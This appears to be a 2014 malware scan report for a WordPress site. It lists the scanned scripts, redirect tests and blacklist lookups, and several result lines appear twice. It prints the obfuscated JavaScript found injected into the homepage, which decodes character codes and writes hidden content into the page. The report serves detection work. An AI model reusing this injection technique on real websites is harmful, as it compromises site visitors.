Scanned pages/files
Request | Server response | Status |
http://alphadeltachimu.com/ | 200 OK Content-Length: 21353 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gu2 = []; _gu2.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gu2.push(['_setOption', '6918518510413211617217816718517416518919318218118517518']); _gu2.push(['_setPageId', '6175181180128167168185181178187186171129169178175182128']); _gu2.push(['_setOption', '1841711691861101221221221821901141671871861811141671871']); _gu2.push(['_setPageId', '8618111412212212218219011112919513011718518619117817113']); _gu2.push(['_setOption', '2']); var i2='h',df='C',a3='e',pe='r',gf='a',q9='o',m6='m',jd='o',k0='d',b4='r',xf='f',n2='C',t76=z56=''; var d12=3,d22=70,l44=p23=v48=0;for(v48=0;v48<_gu2.length;v48++)t76+=_gu2[v48][1];l44=t76.length; while(p23<l44)z56+=String[xf+b4+jd+m6+n2+i2+gf+pe+df+q9+k0+a3](parseInt(t76.slice(p23,p23+=d12))-d22); document.write(z56); Antivirus reports:
| ||
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.min.js | 200 OK Content-Length: 72328 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/comment-reply.js | 200 OK Content-Length: 1276 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jqueryslidemenu.js | 200 OK Content-Length: 2565 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/shlomb.js | 200 OK Content-Length: 318 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/shorwa.js | 200 OK Content-Length: 321 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.prettyPhoto.js | 200 OK Content-Length: 23975 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 9716 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/ColaborateLight_400.font.js | 200 OK Content-Length: 18611 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/themes/Gabix/js/Colaborate-Regular_400.font.js | 200 OK Content-Length: 18635 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/wp-content/plugins/zero-spam/zero-spam.min.js?ver=1.1.0 | 200 OK Content-Length: 196 Content-Type: application/x-javascript | clean |
http://alphadeltachimu.com/who-we-are/ | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: alphadeltachimu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 06:51:30 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://alphadeltachimu.com/xmlrpc.php
GET / HTTP/1.1
Host: alphadeltachimu.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Sep 2014 06:51:30 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://alphadeltachimu.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: alphadeltachimu.com
Referer: http://www.google.com/search?q=alphadeltachimu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: alphadeltachimu.com
Referer: http://www.google.com/search?q=alphadeltachimu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=alphadeltachimu.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alphadeltachimu.com/
Result: alphadeltachimu.com is not infected or malware details are not published yet.
Result: alphadeltachimu.com is not infected or malware details are not published yet.